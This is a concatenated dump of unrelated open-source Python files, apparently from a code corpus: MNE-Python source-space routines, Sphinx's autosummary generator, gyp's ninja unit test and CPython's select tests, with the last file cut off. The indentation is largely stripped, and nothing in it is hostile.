s[key] = None
else:
d = parallel(p_fun(adjacency, s['vertno'], r, dist_limit)
for r in np.array_split(np.arange(len(s['vertno'])),
n_jobs))
# deal with indexing so we can add patch info
min_idx = np.array([dd[1] for dd in d])
min_dist = np.array([dd[2] for dd in d])
midx = np.argmin(min_dist, axis=0)
range_idx = np.arange(len(s['rr']))
min_dist = min_dist[midx, range_idx]
min_idx = min_idx[midx, range_idx]
min_dists.append(min_dist)
min_idxs.append(min_idx)
# convert to sparse representation
d = np.concatenate([dd[0] for dd in d]).ravel() # already float32
idx = d > 0
d = d[idx]
i, j = np.meshgrid(s['vertno'], s['vertno'])
i = i.ravel()[idx]
j = j.ravel()[idx]
s['dist'] = csr_matrix(
(d, (i, j)), shape=(s['np'], s['np']), dtype=np.float32)
s['dist_limit'] = np.array([dist_limit], np.float32)
# Let's see if our distance was sufficient to allow for patch info
if not any(np.any(np.isinf(md)) for md in min_dists):
# Patch info can be added!
for s, min_dist, min_idx in zip(src, min_dists, min_idxs):
s['nearest'] = min_idx
s['nearest_dist'] = min_dist
_add_patch_info(s)
else:
logger.info('Not adding patch information, dist_limit too small')
return src
def _do_src_distances(con, vertno, run_inds, limit):
"""Compute source space distances in chunks."""
from scipy.sparse.csgraph import dijkstra
func = partial(dijkstra, limit=limit)
chunk_size = 20 # save memory by chunking (only a little slower)
lims = np.r_[np.arange(0, len(run_inds), chunk_size), len(run_inds)]
n_chunks = len(lims) - 1
# eventually we want this in float32, so save memory by only storing 32-bit
d = np.empty((len(run_inds), len(vertno)), np.float32)
min_dist = np.empty((n_chunks, con.shape[0]))
min_idx = np.empty((n_chunks, con.shape[0]), np.int32)
range_idx = np.arange(con.shape[0])
for li, (l1, l2) in enumerate(zip(lims[:-1], lims[1:])):
idx = vertno[run_inds[l1:l2]]
out = func(con, indices=idx)
midx = np.argmin(out, axis=0)
min_idx[li] = idx[midx]
min_dist[li] = out[midx, range_idx]
d[l1:l2] = out[:, vertno]
midx = np.argmin(min_dist, axis=0)
min_dist = min_dist[midx, range_idx]
min_idx = min_idx[midx, range_idx]
d[d == np.inf] = 0 # scipy will give us np.inf for uncalc. distances
return d, min_idx, min_dist
def get_volume_labels_from_aseg(mgz_fname, return_colors=False,
atlas_ids=None):
"""Return a list of names and colors of segmented volumes.
Parameters
----------
mgz_fname : str
Filename to read. Typically aseg.mgz or some variant in the freesurfer
pipeline.
return_colors : bool
        If True, also return the label colors.
atlas_ids : dict | None
A lookup table providing a mapping from region names (str) to ID values
(int). Can be None to use the standard Freesurfer LUT.
.. versionadded:: 0.21.0
Returns
-------
label_names : list of str
The names of segmented volumes included in this mgz file.
label_colors : list of str
The RGB colors of the labels included in this mgz file.
See Also
--------
read_freesurfer_lut
Notes
-----
.. versionchanged:: 0.21.0
The label names are now sorted in the same order as their corresponding
values in the MRI file.
.. versionadded:: 0.9.0
"""
import nibabel as nib
atlas = nib.load(mgz_fname)
data = np.asarray(atlas.dataobj) # don't need float here
want = np.unique(data)
if atlas_ids is None:
atlas_ids, colors = read_freesurfer_lut()
elif return_colors:
raise ValueError('return_colors must be False if atlas_ids are '
'provided')
# restrict to the ones in the MRI, sorted by label name
keep = np.in1d(list(atlas_ids.values()), want)
keys = sorted((key for ki, key in enumerate(atlas_ids.keys()) if keep[ki]),
key=lambda x: atlas_ids[x])
if return_colors:
colors = [colors[k] for k in keys]
out = keys, colors
else:
out = keys
return out
# XXX this should probably be deprecated because it returns surface Labels,
# and probably isn't the way to go moving forward
# XXX this also assumes that the first two source spaces are surf without
# checking, which might not be the case (could be all volumes)
@fill_doc
def get_volume_labels_from_src(src, subject, subjects_dir):
"""Return a list of Label of segmented volumes included in the src space.
Parameters
----------
src : instance of SourceSpaces
The source space containing the volume regions.
%(subject)s
subjects_dir : str
Freesurfer folder of the subjects.
Returns
-------
labels_aseg : list of Label
List of Label of segmented volumes included in src space.
"""
from . import Label
from . import get_volume_labels_from_aseg
# Read the aseg file
aseg_fname = op.join(subjects_dir, subject, 'mri', 'aseg.mgz')
if not op.isfile(aseg_fname):
raise IOError('aseg file "%s" not found' % aseg_fname)
all_labels_aseg = get_volume_labels_from_aseg(
aseg_fname, return_colors=True)
# Create a list of Label
if len(src) < 2:
raise ValueError('No vol src space in src')
if any(np.any(s['type'] != 'vol') for s in src[2:]):
raise ValueError('source spaces have to be of vol type')
labels_aseg = list()
for nr in range(2, len(src)):
vertices = src[nr]['vertno']
pos = src[nr]['rr'][src[nr]['vertno'], :]
roi_str = src[nr]['seg_name']
try:
ind = all_labels_aseg[0].index(roi_str)
color = np.array(all_labels_aseg[1][ind]) / 255
except ValueError:
pass
if 'left' in roi_str.lower():
hemi = 'lh'
roi_str = roi_str.replace('Left-', '') + '-lh'
elif 'right' in roi_str.lower():
hemi = 'rh'
roi_str = roi_str.replace('Right-', '') + '-rh'
else:
hemi = 'both'
label = Label(vertices=vertices, pos=pos, hemi=hemi,
name=roi_str, color=color,
subject=subject)
labels_aseg.append(label)
return labels_aseg
def _get_hemi(s):
"""Get a hemisphere from a given source space."""
if s['type'] != 'surf':
raise RuntimeError('Only surface source spaces supported')
if s['id'] == FIFF.FIFFV_MNE_SURF_LEFT_HEMI:
return 'lh', 0, s['id']
elif s['id'] == FIFF.FIFFV_MNE_SURF_RIGHT_HEMI:
return 'rh', 1, s['id']
else:
raise ValueError('unknown surface ID %s' % s['id'])
def _get_vertex_map_nn(fro_src, subject_from, subject_to, hemi, subjects_dir,
to_neighbor_tri=None):
"""Get a nearest-neigbor vertex match for a given hemi src.
The to_neighbor_tri can optionally be passed in to avoid recomputation
if it's already available.
"""
# adapted from mne_make_source_space.c, knowing accurate=False (i.e.
# nearest-neighbor mode should be used)
logger.info('Mapping %s %s -> %s (nearest neighbor)...'
% (hemi, subject_from, subject_to))
regs = [op.join(subjects_dir, s, 'surf', '%s.sphere.reg' % hemi)
for s in (subject_from, subject_to)]
reg_fro, reg_to = [read_surface(r, return_dict=True)[-1] for r in regs]
if to_neighbor_tri is not None:
reg_to['neighbor_tri'] = to_neighbor_tri
if 'neighbor_tri' not in reg_to:
reg_to['neighbor_tri'] = _triangle_neighbors(reg_to['tris'],
reg_to['np'])
    morph_inuse = np.zeros(len(reg_to['rr']), bool)
best = np.zeros(fro_src['np'], int)
ones = _compute_nearest(reg_to['rr'], reg_fro['rr'][fro_src['vertno']])
for v, one in zip(fro_src['vertno'], ones):
# if it were actually a proper morph map, we would do this, but since
# we know it's nearest neighbor list, we don't need to:
# this_mm = mm[v]
# one = this_mm.indices[this_mm.data.argmax()]
if morph_inuse[one]:
# Try the nearest neighbors
neigh = _get_surf_neighbors(reg_to, one) # on demand calc
was = one
one = neigh[np.where(~morph_inuse[neigh])[0]]
if len(one) == 0:
                raise RuntimeError('vertex %d would be used multiple times.'
                                   % was)
one = one[0]
logger.info('Source space vertex moved from %d to %d because of '
'double occupation.' % (was, one))
best[v] = one
morph_inuse[one] = True
return best
@verbose
def morph_source_spaces(src_from, subject_to, surf='white', subject_from=None,
subjects_dir=None, verbose=None):
"""Morph an existing source space to a different subject.
.. warning:: This can be used in place of morphing source estimates for
multiple subjects, but there may be consequences in terms
of dipole topology.
Parameters
----------
src_from : instance of SourceSpaces
Surface source spaces to morph.
subject_to : str
The destination subject.
surf : str
The brain surface to use for the new source space.
subject_from : str | None
The "from" subject. For most source spaces this shouldn't need
to be provided, since it is stored in the source space itself.
subjects_dir : str | None
Path to SUBJECTS_DIR if it is not set in the environment.
%(verbose)s
Returns
-------
src : instance of SourceSpaces
The morphed source spaces.
Notes
-----
.. versionadded:: 0.10.0
"""
# adapted from mne_make_source_space.c
src_from = _ensure_src(src_from)
subject_from = _ensure_src_subject(src_from, subject_from)
subjects_dir = get_subjects_dir(subjects_dir, raise_error=True)
src_out = list()
for fro in src_from:
hemi, idx, id_ = _get_hemi(fro)
to = op.join(subjects_dir, subject_to, 'surf', '%s.%s' % (hemi, surf,))
logger.info('Reading destination surface %s' % (to,))
to = read_surface(to, return_dict=True, verbose=False)[-1]
complete_surface_info(to, copy=False)
# Now we morph the vertices to the destination
# The C code does something like this, but with a nearest-neighbor
# mapping instead of the weighted one::
#
# >>> mm = read_morph_map(subject_from, subject_to, subjects_dir)
#
# Here we use a direct NN calculation, since picking the max from the
# existing morph map (which naively one might expect to be equivalent)
# differs for ~3% of vertices.
best = _get_vertex_map_nn(fro, subject_from, subject_to, hemi,
subjects_dir, to['neighbor_tri'])
for key in ('neighbor_tri', 'tri_area', 'tri_cent', 'tri_nn',
'use_tris'):
del to[key]
to['vertno'] = np.sort(best[fro['vertno']])
to['inuse'] = np.zeros(len(to['rr']), int)
to['inuse'][to['vertno']] = True
to['use_tris'] = best[fro['use_tris']]
to.update(nuse=len(to['vertno']), nuse_tri=len(to['use_tris']),
nearest=None, nearest_dist=None, patch_inds=None, pinfo=None,
dist=None, id=id_, dist_limit=None, type='surf',
coord_frame=FIFF.FIFFV_COORD_MRI, subject_his_id=subject_to,
rr=to['rr'] / 1000.)
src_out.append(to)
logger.info('[done]\n')
info = dict(working_dir=os.getcwd(), command_line=_get_call_line())
return SourceSpaces(src_out, info=info)
@verbose
def _get_morph_src_reordering(vertices, src_from, subject_from, subject_to,
subjects_dir=None, verbose=None):
"""Get the reordering indices for a morphed source space.
Parameters
----------
vertices : list
The vertices for the left and right hemispheres.
src_from : instance of SourceSpaces
The original source space.
subject_from : str
The source subject.
subject_to : str
The destination subject.
%(subjects_dir)s
%(verbose)s
Returns
-------
data_idx : ndarray, shape (n_vertices,)
        The index array used to reorder the data.
    from_vertices : list
        The left and right hemisphere vertex numbers for the "from" subject.
"""
subjects_dir = get_subjects_dir(subjects_dir, raise_error=True)
from_vertices = list()
data_idxs = list()
offset = 0
for ii, hemi in enumerate(('lh', 'rh')):
# Get the mapping from the original source space to the destination
# subject's surface vertex numbers
best = _get_vertex_map_nn(src_from[ii], subject_from, subject_to,
hemi, subjects_dir)
full_mapping = best[src_from[ii]['vertno']]
# Tragically, we might not have all of our vertno left (e.g. because
# some are omitted during fwd calc), so we must do some indexing magic:
# From all vertices, a subset could be chosen by fwd calc:
used_vertices = np.in1d(full_mapping, vertices[ii])
from_vertices.append(src_from[ii]['vertno'][used_vertices])
remaining_mapping = full_mapping[used_vertices]
if not np.array_equal(np.sort(remaining_mapping), vertices[ii]) or \
not np.in1d(vertices[ii], full_mapping).all():
raise RuntimeError('Could not map vertices, perhaps the wrong '
'subject "%s" was provided?' % subject_from)
# And our data have been implicitly remapped by the forced ascending
# vertno order in source spaces
implicit_mapping = np.argsort(remaining_mapping) # happens to data
data_idx = np.argsort(implicit_mapping) # to reverse the mapping
data_idx += offset # hemisphere offset
data_idxs.append(data_idx)
offset += len(implicit_mapping)
data_idx = np.concatenate(data_idxs)
# this one is really just a sanity check for us, should never be violated
# by users
assert np.array_equal(np.sort(data_idx),
np.arange(sum(len(v) for v in vertices)))
return data_idx, from_vertices
def _compare_source_spaces(src0, src1, mode='exact', nearest=True,
dist_tol=1.5e-3):
"""Compare two source spaces.
Note: this function is also used by forward/tests/test_make_forward.py
"""
from numpy.testing import (assert_allclose, assert_array_equal,
assert_equal, assert_, assert_array_less)
from scipy.spatial.distance import cdist
if mode != 'exact' and 'approx' not in mode: # 'nointerp' can be appended
raise RuntimeError('unknown mode %s' % mode)
for si, (s0, s1) in enumerate(zip(src0, src1)):
# first check the keys
a, b = set(s0.keys()), set(s1.keys())
assert_equal(a, b, str(a ^ b))
for name in ['nuse', 'ntri', 'np', 'type', 'id']:
a, b = s0[name], s1[name]
if name == 'id': # workaround for old NumPy bug
a, b = int(a), int(b)
assert_equal(a, b, name)
for name in ['subject_his_id']:
if name in s0 or name in s1:
assert_equal(s0[name], s1[name], name)
for name in ['interpolator']:
if name in s0 or name in s1:
assert name in s0, f'{name} in s1 but not s0'
                assert name in s1, f'{name} in s0 but not s1'
n = np.prod(s0['interpolator'].shape)
diffs = (s0['interpolator'] - s1['interpolator']).data
if len(diffs) > 0 and 'nointerp' not in mode:
# 0.1%
assert_array_less(
np.sqrt(np.sum(diffs * diffs) / n), 0.001,
err_msg=f'{name} > 0.1%')
for name in ['nn', 'rr', 'nuse_tri', 'coord_frame', 'tris']:
if s0[name] is None:
assert_(s1[name] is None, name)
else:
if mode == 'exact':
assert_array_equal(s0[name], s1[name], name)
else: # 'approx' in mode
atol = 1e-3 if name == 'nn' else 1e-4
assert_allclose(s0[name], s1[name], rtol=1e-3, atol=atol,
err_msg=name)
for name in ['seg_name']:
if name in s0 or name in s1:
assert_equal(s0[name], s1[name], name)
# these fields will exist if patch info was added
if nearest:
for name in ['nearest', 'nearest_dist', 'patch_inds']:
if s0[name] is None:
assert_(s1[name] is None, name)
else:
atol = 0 if mode == 'exact' else 1e-6
assert_allclose(s0[name], s1[name],
atol=atol, err_msg=name)
for name in ['pinfo']:
if s0[name] is None:
assert_(s1[name] is None, name)
else:
assert_(len(s0[name]) == len(s1[name]), name)
for p1, p2 in zip(s0[name], s1[name]):
assert_(all(p1 == p2), name)
if mode == 'exact':
for name in ['inuse', 'vertno', 'use_tris']:
assert_array_equal(s0[name], s1[name], err_msg=name)
for name in ['dist_limit']:
assert_(s0[name] == s1[name], name)
for name in ['dist']:
if s0[name] is not None:
assert_equal(s1[name].shape, s0[name].shape)
assert_(len((s0['dist'] - s1['dist']).data) == 0)
else: # 'approx' in mode:
# deal with vertno, inuse, and use_tris carefully
for ii, s in enumerate((s0, s1)):
assert_array_equal(s['vertno'], np.where(s['inuse'])[0],
'src%s[%s]["vertno"] != '
'np.where(src%s[%s]["inuse"])[0]'
% (ii, si, ii, si))
assert_equal(len(s0['vertno']), len(s1['vertno']))
agreement = np.mean(s0['inuse'] == s1['inuse'])
assert_(agreement >= 0.99, "%s < 0.99" % agreement)
if agreement < 1.0:
# make sure mismatched vertno are within 1.5mm
v0 = np.setdiff1d(s0['vertno'], s1['vertno'])
v1 = np.setdiff1d(s1['vertno'], s0['vertno'])
dists = cdist(s0['rr'][v0], s1['rr'][v1])
assert_allclose(np.min(dists, axis=1), np.zeros(len(v0)),
atol=dist_tol, err_msg='mismatched vertno')
if s0['use_tris'] is not None: # for "spacing"
assert_array_equal(s0['use_tris'].shape, s1['use_tris'].shape)
else:
assert_(s1['use_tris'] is None)
assert_(np.mean(s0['use_tris'] == s1['use_tris']) > 0.99)
# The above "if s0[name] is not None" can be removed once the sample
# dataset is updated to have a source space with distance info
for name in ['working_dir', 'command_line']:
if mode == 'exact':
assert_equal(src0.info[name], src1.info[name])
else: # 'approx' in mode:
if name in src0.info:
assert_(name in src1.info, '"%s" missing' % name)
else:
assert_(name not in src1.info, '"%s" should not exist' % name)
def _set_source_space_vertices(src, vertices):
"""Reset the list of source space vertices."""
assert len(src) == len(vertices)
for s, v in zip(src, vertices):
s['inuse'].fill(0)
s['nuse'] = len(v)
s['vertno'] = np.array(v)
s['inuse'][s['vertno']] = 1
s['use_tris'] = np.array([[]], int)
s['nuse_tri'] = np.array([0])
        # This will fix 'patch_inds' and 'pinfo'
_adjust_patch_info(s, verbose=False)
return src
def _get_src_nn(s, use_cps=True, vertices=None):
vertices = s['vertno'] if vertices is None else vertices
if use_cps and s.get('patch_inds') is not None:
nn = np.empty((len(vertices), 3))
for vp, p in enumerate(np.searchsorted(s['vertno'], vertices)):
assert(s['vertno'][p] == vertices[vp])
            # Sum the normals of all vertices in this patch (normalized below)
nn[vp] = np.sum(
s['nn'][s['pinfo'][s['patch_inds'][p]], :], axis=0)
nn /= np.linalg.norm(nn, axis=-1, keepdims=True)
else:
nn = s['nn'][vertices, :]
return nn
@verbose
def compute_distance_to_sensors(src, info, picks=None, trans=None,
verbose=None):
"""Compute distances between vertices and sensors.
Parameters
----------
src : instance of SourceSpaces
The object with vertex positions for which to compute distances to
sensors.
info : instance of Info
Measurement information with sensor positions to which distances shall
be computed.
%(picks_good_data)s
%(trans_not_none)s
%(verbose)s
Returns
-------
depth : array of shape (n_vertices, n_channels)
The Euclidean distances of source space vertices with respect to
sensors.
"""
from scipy.spatial.distance import cdist
assert isinstance(src, SourceSpaces)
_validate_type(info, (Info,), 'info')
# Load the head<->MRI transform if necessary
if src[0]['coord_frame'] == FIFF.FIFFV_COORD_MRI:
src_trans, _ = _get_trans(trans, allow_none=False)
else:
src_trans = Transform('head', 'head') # Identity transform
# get vertex position in same coordinates as for sensors below
src_pos = np.vstack([
        apply_trans(src_trans, s['rr'][s['inuse'].astype(bool)])
for s in src
])
# Select channels to be used for distance calculations
picks = _picks_to_idx(info, picks, 'data', exclude=())
# get sensor positions
sensor_pos = []
dev_to_head = None
for ch in picks:
# MEG channels are in device coordinates, translate them to head
if channel_type(info, ch) in ['mag', 'grad']:
if dev_to_head is None:
dev_to_head = _ensure_trans(info['dev_head_t'],
'meg', 'head')
sensor_pos.append(apply_trans(dev_to_head,
info['chs'][ch]['loc'][:3]))
else:
sensor_pos.append(info['chs'][ch]['loc'][:3])
sensor_pos = np.array(sensor_pos)
depths = cdist(src_pos, sensor_pos)
return depths
@verbose
def get_mni_fiducials(subject, subjects_dir=None, verbose=None):
"""Estimate fiducials for a subject.
Parameters
----------
%(subject)s
%(subjects_dir)s
%(verbose)s
Returns
-------
fids_mri : list
List of estimated fiducials (each point in a dict), in the order
LPA, nasion, RPA.
Notes
-----
    This takes the ``fsaverage-fiducials.fif`` file included with MNE, which
    contains the LPA, nasion, and RPA for the ``fsaverage`` subject, and
    transforms the points to the given FreeSurfer subject's MRI space.
    The MRI of ``fsaverage`` is already in MNI Talairach space, so the
    inverse of the given subject's MNI Talairach affine transformation
    (``$SUBJECTS_DIR/$SUBJECT/mri/transforms/talairach.xfm``) is applied to
    estimate the subject's fiducial locations.
For more details about the coordinate systems and transformations involved,
see https://surfer.nmr.mgh.harvard.edu/fswiki/CoordinateSystems and
:ref:`plot_source_alignment`.
"""
# Eventually we might want to allow using the MNI Talairach with-skull
    # transformation rather than the standard brain-based MNI Talairach
# transformation, and/or project the points onto the head surface
# (if available).
fname_fids_fs = os.path.join(os.path.dirname(__file__), 'data',
'fsaverage', 'fsaverage-fiducials.fif')
# Read fsaverage fiducials file and subject Talairach.
fids, coord_frame = read_fiducials(fname_fids_fs)
assert coord_frame == FIFF.FIFFV_COORD_MRI
if subject == 'fsaverage':
return fids # special short-circuit for fsaverage
mni_mri_t = invert_transform(read_talxfm(subject, subjects_dir))
for f in fids:
f['r'] = apply_trans(mni_mri_t, f['r'])
return fids
|
neumerance/deploy
|
refs/heads/master
|
.venv/lib/python2.7/site-packages/sphinx/ext/autosummary/generate.py
|
5
|
# -*- coding: utf-8 -*-
"""
sphinx.ext.autosummary.generate
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Usable as a library or script to generate automatic RST source files for
items referred to in autosummary:: directives.
Each generated RST file contains a single auto*:: directive which
extracts the docstring of the referred item.
Example Makefile rule::
generate:
sphinx-autogen -o source/generated source/*.rst
:copyright: Copyright 2007-2011 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import os
import re
import sys
import pydoc
import optparse
from jinja2 import FileSystemLoader, TemplateNotFound
from jinja2.sandbox import SandboxedEnvironment
from sphinx import package_dir
from sphinx.ext.autosummary import import_by_name, get_documenter
from sphinx.jinja2glue import BuiltinTemplateLoader
from sphinx.util.osutil import ensuredir
from sphinx.util.inspect import safe_getattr
def main(argv=sys.argv):
usage = """%prog [OPTIONS] SOURCEFILE ..."""
p = optparse.OptionParser(usage.strip())
p.add_option("-o", "--output-dir", action="store", type="string",
dest="output_dir", default=None,
help="Directory to place all output in")
p.add_option("-s", "--suffix", action="store", type="string",
dest="suffix", default="rst",
help="Default suffix for files (default: %default)")
p.add_option("-t", "--templates", action="store", type="string",
dest="templates", default=None,
help="Custom template directory (default: %default)")
options, args = p.parse_args(argv[1:])
if len(args) < 1:
p.error('no input files given')
generate_autosummary_docs(args, options.output_dir,
"." + options.suffix,
template_dir=options.templates)
def _simple_info(msg):
print msg
def _simple_warn(msg):
print >> sys.stderr, 'WARNING: ' + msg
# -- Generating output ---------------------------------------------------------
def generate_autosummary_docs(sources, output_dir=None, suffix='.rst',
warn=_simple_warn, info=_simple_info,
base_path=None, builder=None, template_dir=None):
showed_sources = list(sorted(sources))
if len(showed_sources) > 20:
showed_sources = showed_sources[:10] + ['...'] + showed_sources[-10:]
info('[autosummary] generating autosummary for: %s' %
', '.join(showed_sources))
if output_dir:
info('[autosummary] writing to %s' % output_dir)
if base_path is not None:
sources = [os.path.join(base_path, filename) for filename in sources]
# create our own templating environment
template_dirs = [os.path.join(package_dir, 'ext',
'autosummary', 'templates')]
if builder is not None:
# allow the user to override the templates
template_loader = BuiltinTemplateLoader()
template_loader.init(builder, dirs=template_dirs)
else:
if template_dir:
template_dirs.insert(0, template_dir)
template_loader = FileSystemLoader(template_dirs)
template_env = SandboxedEnvironment(loader=template_loader)
# read
items = find_autosummary_in_files(sources)
# remove possible duplicates
items = dict([(item, True) for item in items]).keys()
# keep track of new files
new_files = []
# write
for name, path, template_name in sorted(items):
if path is None:
# The corresponding autosummary:: directive did not have
# a :toctree: option
continue
path = output_dir or os.path.abspath(path)
ensuredir(path)
try:
name, obj, parent = import_by_name(name)
except ImportError, e:
warn('[autosummary] failed to import %r: %s' % (name, e))
continue
fn = os.path.join(path, name + suffix)
# skip it if it exists
if os.path.isfile(fn):
continue
new_files.append(fn)
f = open(fn, 'w')
try:
doc = get_documenter(obj, parent)
if template_name is not None:
template = template_env.get_template(template_name)
else:
try:
template = template_env.get_template('autosummary/%s.rst'
% doc.objtype)
except TemplateNotFound:
template = template_env.get_template('autosummary/base.rst')
def get_members(obj, typ, include_public=[]):
items = []
for name in dir(obj):
try:
documenter = get_documenter(safe_getattr(obj, name),
obj)
except AttributeError:
continue
if documenter.objtype == typ:
items.append(name)
public = [x for x in items
if x in include_public or not x.startswith('_')]
return public, items
ns = {}
if doc.objtype == 'module':
ns['members'] = dir(obj)
ns['functions'], ns['all_functions'] = \
get_members(obj, 'function')
ns['classes'], ns['all_classes'] = \
get_members(obj, 'class')
ns['exceptions'], ns['all_exceptions'] = \
get_members(obj, 'exception')
elif doc.objtype == 'class':
ns['members'] = dir(obj)
ns['methods'], ns['all_methods'] = \
get_members(obj, 'method', ['__init__'])
ns['attributes'], ns['all_attributes'] = \
get_members(obj, 'attribute')
parts = name.split('.')
if doc.objtype in ('method', 'attribute'):
mod_name = '.'.join(parts[:-2])
cls_name = parts[-2]
obj_name = '.'.join(parts[-2:])
ns['class'] = cls_name
else:
mod_name, obj_name = '.'.join(parts[:-1]), parts[-1]
ns['fullname'] = name
ns['module'] = mod_name
ns['objname'] = obj_name
ns['name'] = parts[-1]
ns['objtype'] = doc.objtype
ns['underline'] = len(name) * '='
rendered = template.render(**ns)
f.write(rendered)
finally:
f.close()
# descend recursively to new files
if new_files:
generate_autosummary_docs(new_files, output_dir=output_dir,
suffix=suffix, warn=warn, info=info,
base_path=base_path, builder=builder,
template_dir=template_dir)
# -- Finding documented entries in files ---------------------------------------
def find_autosummary_in_files(filenames):
"""Find out what items are documented in source/*.rst.
See `find_autosummary_in_lines`.
"""
documented = []
for filename in filenames:
f = open(filename, 'r')
lines = f.read().splitlines()
documented.extend(find_autosummary_in_lines(lines, filename=filename))
f.close()
return documented
def find_autosummary_in_docstring(name, module=None, filename=None):
"""Find out what items are documented in the given object's docstring.
See `find_autosummary_in_lines`.
"""
try:
real_name, obj, parent = import_by_name(name)
lines = pydoc.getdoc(obj).splitlines()
return find_autosummary_in_lines(lines, module=name, filename=filename)
except AttributeError:
pass
except ImportError, e:
print "Failed to import '%s': %s" % (name, e)
return []
def find_autosummary_in_lines(lines, module=None, filename=None):
"""Find out what items appear in autosummary:: directives in the
given lines.
Returns a list of (name, toctree, template) where *name* is a name
of an object and *toctree* the :toctree: path of the corresponding
autosummary directive (relative to the root of the file name), and
*template* the value of the :template: option. *toctree* and
    *template* are ``None`` if the directive does not have the
corresponding options set.
"""
autosummary_re = re.compile(r'^(\s*)\.\.\s+autosummary::\s*')
automodule_re = re.compile(
r'^\s*\.\.\s+automodule::\s*([A-Za-z0-9_.]+)\s*$')
module_re = re.compile(
r'^\s*\.\.\s+(current)?module::\s*([a-zA-Z0-9_.]+)\s*$')
autosummary_item_re = re.compile(r'^\s+(~?[_a-zA-Z][a-zA-Z0-9_.]*)\s*.*?')
toctree_arg_re = re.compile(r'^\s+:toctree:\s*(.*?)\s*$')
template_arg_re = re.compile(r'^\s+:template:\s*(.*?)\s*$')
documented = []
toctree = None
template = None
current_module = module
in_autosummary = False
base_indent = ""
for line in lines:
if in_autosummary:
m = toctree_arg_re.match(line)
if m:
toctree = m.group(1)
if filename:
toctree = os.path.join(os.path.dirname(filename),
toctree)
continue
m = template_arg_re.match(line)
if m:
template = m.group(1).strip()
continue
if line.strip().startswith(':'):
continue # skip options
m = autosummary_item_re.match(line)
if m:
name = m.group(1).strip()
if name.startswith('~'):
name = name[1:]
if current_module and \
not name.startswith(current_module + '.'):
name = "%s.%s" % (current_module, name)
documented.append((name, toctree, template))
continue
if not line.strip() or line.startswith(base_indent + " "):
continue
in_autosummary = False
m = autosummary_re.match(line)
if m:
in_autosummary = True
base_indent = m.group(1)
toctree = None
template = None
continue
m = automodule_re.search(line)
if m:
current_module = m.group(1).strip()
# recurse into the automodule docstring
documented.extend(find_autosummary_in_docstring(
current_module, filename=filename))
continue
m = module_re.match(line)
if m:
current_module = m.group(2)
continue
return documented
if __name__ == '__main__':
main()
|
jarshwah/django
|
refs/heads/master
|
django/conf/locale/pt_BR/__init__.py
|
12133432
| |
gangadhar-kadam/mtn-erpnext
|
refs/heads/master
|
buying/report/requested_items_to_be_ordered/__init__.py
|
12133432
| |
NicolasHerin/game_book_share
|
refs/heads/master
|
node_modules/node-gyp/gyp/pylib/gyp/generator/ninja_test.py
|
1843
|
#!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
""" Unit tests for the ninja.py file. """
import gyp.generator.ninja as ninja
import unittest
import StringIO
import sys
import TestCommon
class TestPrefixesAndSuffixes(unittest.TestCase):
def test_BinaryNamesWindows(self):
# These cannot run on non-Windows as they require a VS installation to
# correctly handle variable expansion.
if sys.platform.startswith('win'):
writer = ninja.NinjaWriter('foo', 'wee', '.', '.', 'build.ninja', '.',
'build.ninja', 'win')
spec = { 'target_name': 'wee' }
self.assertTrue(writer.ComputeOutputFileName(spec, 'executable').
endswith('.exe'))
self.assertTrue(writer.ComputeOutputFileName(spec, 'shared_library').
endswith('.dll'))
self.assertTrue(writer.ComputeOutputFileName(spec, 'static_library').
endswith('.lib'))
def test_BinaryNamesLinux(self):
writer = ninja.NinjaWriter('foo', 'wee', '.', '.', 'build.ninja', '.',
'build.ninja', 'linux')
spec = { 'target_name': 'wee' }
self.assertTrue('.' not in writer.ComputeOutputFileName(spec,
'executable'))
self.assertTrue(writer.ComputeOutputFileName(spec, 'shared_library').
startswith('lib'))
self.assertTrue(writer.ComputeOutputFileName(spec, 'static_library').
startswith('lib'))
self.assertTrue(writer.ComputeOutputFileName(spec, 'shared_library').
endswith('.so'))
self.assertTrue(writer.ComputeOutputFileName(spec, 'static_library').
endswith('.a'))
if __name__ == '__main__':
unittest.main()
|
CoDEmanX/ArangoDB
|
refs/heads/devel
|
3rdParty/V8-4.3.61/third_party/python_26/Lib/test/test_select.py
|
56
|
from test import test_support
import unittest
import select
import os
import sys
class SelectTestCase(unittest.TestCase):
class Nope:
pass
class Almost:
def fileno(self):
return 'fileno'
def test_error_conditions(self):
self.assertRaises(TypeError, select.select, 1, 2, 3)
self.assertRaises(TypeError, select.select, [self.Nope()], [], [])
self.assertRaises(TypeError, select.select, [self.Almost()], [], [])
self.assertRaises(TypeError, select.select, [], [], [], "not a number")
def test_select(self):
if sys.platform[:3] in ('win', 'mac', 'os2', 'riscos'):
if test_support.verbose:
print "Can't test select easily on", sys.platform
return
cmd = 'for i in 0 1 2 3 4 5 6 7 8 9; do echo testing...; sleep 1; done'
p = os.popen(cmd, 'r')
for tout in (0, 1, 2, 4, 8, 16) + (None,)*10:
if test_support.verbose:
print 'timeout =', tout
rfd, wfd, xfd = select.select([p], [], [], tout)
if (rfd, wfd, xfd) == ([], [], []):
continue
if (rfd, wfd, xfd) == ([p], [], []):
line = p.readline()
if test_support.verbose:
print repr(line)
if not line:
if test_support.verbose:
print 'EOF'
break
continue
self.fail('Unexpected return values from select():', rfd, wfd, xfd)
p.close()
def test_main():
test_support.run_unittest(SelectTestCase)
test_support.reap_children()
if __name__ == "__main__":
test_main()
|
matmutant/sl4a
|
refs/heads/master
|
python/src/Lib/test/test_select.py
|
56
|
from test import test_support
import unittest
import select
import os
import sys
class SelectTestCase(unittest.TestCase):
class Nope:
pass
class Almost:
def fileno(self):
return 'fileno'
def test_error_conditions(self):
self.assertRaises(TypeError, select.select, 1, 2, 3)
self.assertRaises(TypeError, select.select, [self.Nope()], [], [])
self.assertRaises(TypeError, select.select, [self.Almost()], [], [])
self.assertRaises(TypeError, select.select, [], [], [], "not a number")
def test_select(self):
if sys.platform[:3] in ('win', 'mac', 'os2', 'riscos'):
if test_support.verbose:
print "Can't test select easily on", sys.platform
return
cmd = 'for i in 0 1 2 3 4 5 6 7 8 9; do echo testing...; sleep 1; done'
p = os.popen(cmd, 'r')
for tout in (0, 1, 2, 4, 8, 16) + (None,)*10:
if test_support.verbose:
print 'timeout =', tout
rfd, wfd, xfd = select.select([p], [], [], tout)
if (rfd, wfd, xfd) == ([], [], []):
continue
if (rfd, wfd, xfd) == ([p], [], []):
line = p.readline()
if test_support.verbose:
print repr(line)
if not line:
if test_support.verbose:
print 'EOF'
break
continue
